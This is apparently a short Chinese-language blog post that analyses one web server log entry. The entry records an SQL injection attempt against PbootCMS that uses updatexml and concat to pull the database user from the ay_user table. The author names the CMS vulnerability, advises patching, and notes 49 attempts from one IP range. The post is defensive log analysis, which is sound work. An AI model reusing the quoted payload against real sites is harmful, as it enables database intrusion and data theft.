2023年4月24日 星期一

從 Web Log 學習系統漏洞 81

新東西

173.239.254.158 - - [23/Apr/2023:09:19:36 +0800] "GET /index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1))%23=123](http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1))%23=123) HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"

從紅色部分查詢過後得知這是一個利用 PbootCMS漏洞進行的 SQL注入攻擊
而 PbootCMS 是一個免費php網站架站系統, 看來這系統有漏洞, 如果有使用者建議更新至最新版本或修補漏洞或更換別種架站系統

再稍微調查一下, 從印度來的

用 173.239.254網段不斷切換 IP, 前前後後做了49次入侵攻擊

沒有留言:

張貼留言